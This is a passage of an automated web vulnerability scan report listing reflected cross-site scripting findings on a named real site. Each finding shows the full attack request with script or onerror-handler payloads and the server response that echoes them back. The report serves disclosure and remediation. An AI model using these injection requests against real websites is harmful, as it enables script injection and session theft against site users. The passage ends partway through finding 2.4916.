Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/search.php?keyword=search...&Submit3=Searchcc25f<a>201ab26538d&opt=2 was not found on this server.</p>
...[SNIP]...

2.4899. http://www.resellerbase.com/travel-vaccation/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload efc7f<a>e3ffb159616 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/search.php?keyword=search...efc7f<a>e3ffb159616&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/search.php?keyword=search...efc7f<a>e3ffb159616&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4900. http://www.resellerbase.com/travel-vaccation/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7e260<script>alert(1)</script>f055ca956ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&7e260<script>alert(1)</script>f055ca956ed=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&7e260<script>alert(1)</script>f055ca956ed=1 was not found on this server.</p>
...[SNIP]...

2.4901. http://www.resellerbase.com/travel-vaccation/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 8748c<a>8638b49a3e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=28748c<a>8638b49a3e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=28748c<a>8638b49a3e was not found on this server.</p>
...[SNIP]...

2.4902. http://www.resellerbase.com/travel-vaccation/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e184e<script>alert(1)</script>604afe0a35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccatione184e<script>alert(1)</script>604afe0a35/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccatione184e<script>alert(1)</script>604afe0a35/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4903. http://www.resellerbase.com/travel-vaccation/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 782a5<script>alert(1)</script>bdeaafb3c70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes782a5<script>alert(1)</script>bdeaafb3c70/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes782a5<script>alert(1)</script>bdeaafb3c70/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4904. http://www.resellerbase.com/travel-vaccation/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9b152<script>alert(1)</script>f5aefec7db7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/search.php9b152<script>alert(1)</script>f5aefec7db7?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/search.php9b152<script>alert(1)</script>f5aefec7db7?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4905. http://www.resellerbase.com/travel-vaccation/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3ec8f<a>44a2069f259 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/search.php?keyword=search...&Submit3=Search3ec8f<a>44a2069f259&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/search.php?keyword=search...&Submit3=Search3ec8f<a>44a2069f259&opt=2 was not found on this server.</p>
...[SNIP]...

2.4906. http://www.resellerbase.com/travel-vaccation/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1caad<a>5c3b115ee0a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/search.php?keyword=search...1caad<a>5c3b115ee0a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/search.php?keyword=search...1caad<a>5c3b115ee0a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4907. http://www.resellerbase.com/travel-vaccation/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fc54d<script>alert(1)</script>47a5c261271 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/search.php?keyword=search...&Submit3=Search&opt=2&fc54d<script>alert(1)</script>47a5c261271=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/search.php?keyword=search...&Submit3=Search&opt=2&fc54d<script>alert(1)</script>47a5c261271=1 was not found on this server.</p>
...[SNIP]...

2.4908. http://www.resellerbase.com/travel-vaccation/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 9fb79<a>4b9809e0be2 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/search.php?keyword=search...&Submit3=Search&opt=29fb79<a>4b9809e0be2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/search.php?keyword=search...&Submit3=Search&opt=29fb79<a>4b9809e0be2 was not found on this server.</p>
...[SNIP]...

2.4909. http://www.resellerbase.com/upgrade.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /upgrade.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9d1ce<script>alert(1)</script>9bd0c6c5f55caf8f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /upgrade.php9d1ce<script>alert(1)</script>9bd0c6c5f55caf8f2?query=555-555-0199@example.com&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/upgrade.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /upgrade.php9d1ce<script>alert(1)</script>9bd0c6c5f55caf8f2?query=555-555-0199@example.com&pflag=search&submit=Search was not found on this server.</p>
...[SNIP]...

2.4910. http://www.resellerbase.com/upgrade.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /upgrade.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c6842<script>alert(1)</script>155f1982ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /upgrade.phpc6842<script>alert(1)</script>155f1982ac HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /upgrade.phpc6842<script>alert(1)</script>155f1982ac was not found on this server.</p>
...[SNIP]...

2.4911. http://www.resellerbase.com/upgrade.php [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /upgrade.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 45ec5<a>0e8f9f0d956 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /upgrade.php?id=45ec5<a>0e8f9f0d956&pflag=retrieve&submit=Submit HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/upgrade.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Upgrade a Listing</t
...[SNIP]...
<td>45ec5<a>0e8f9f0d956</td>
...[SNIP]...

2.4912. http://www.resellerbase.com/upgrade.php [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /upgrade.php

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff82c"><img%20src%3da%20onerror%3dalert(1)>4c8b983d952d7c632 was submitted in the query parameter. This input was echoed as ff82c\"><img src=a onerror=alert(1)>4c8b983d952d7c632 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /upgrade.php?query=555-555-0199@example.comff82c"><img%20src%3da%20onerror%3dalert(1)>4c8b983d952d7c632&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/upgrade.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: 555-5
...[SNIP]...
<input type="text" name="keyword" size="20"

value="555-555-0199@example.comff82c\"><img src=a onerror=alert(1)>4c8b983d952d7c632"
/>
...[SNIP]...

2.4913. http://www.resellerbase.com/upgrade.php [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /upgrade.php

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload 3d0c3<img%20src%3da%20onerror%3dalert(1)>5b96e6435c1f8f893 was submitted in the query parameter. This input was echoed as 3d0c3<img src=a onerror=alert(1)>5b96e6435c1f8f893 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /upgrade.php?query=555-555-0199@example.com3d0c3<img%20src%3da%20onerror%3dalert(1)>5b96e6435c1f8f893&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/upgrade.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: 555-5
...[SNIP]...
<b>555-555-0199@example.com3d0c3<img src=a onerror=alert(1)>5b96e6435c1f8f893</b>
...[SNIP]...

2.4914. http://www.resellerbase.com/upgrade.php [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /upgrade.php

Issue detail

The value of the query request parameter is copied into the HTML document as text between TITLE tags. The payload eccb6</title><img%20src%3da%20onerror%3dalert(1)>6dbd7814726de50f0 was submitted in the query parameter. This input was echoed as eccb6</title><img src=a onerror=alert(1)>6dbd7814726de50f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /upgrade.php?query=555-555-0199@example.comeccb6</title><img%20src%3da%20onerror%3dalert(1)>6dbd7814726de50f0&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/upgrade.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: 555-555-0199@example.comeccb6</title><img src=a onerror=alert(1)>6dbd7814726de50f0</title>
...[SNIP]...

2.4915. http://www.resellerbase.com/upgrade.php/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /upgrade.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7c3f6<script>alert(1)</script>a87d4aa083f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /upgrade.php7c3f6<script>alert(1)</script>a87d4aa083f/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:17:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /upgrade.php7c3f6<script>alert(1)</script>a87d4aa083f/ was not found on this server.</p>
...[SNIP]...

2.4916. http://www.resellerbase.com/user_detail.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e8d77<a>bc8a110f9f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

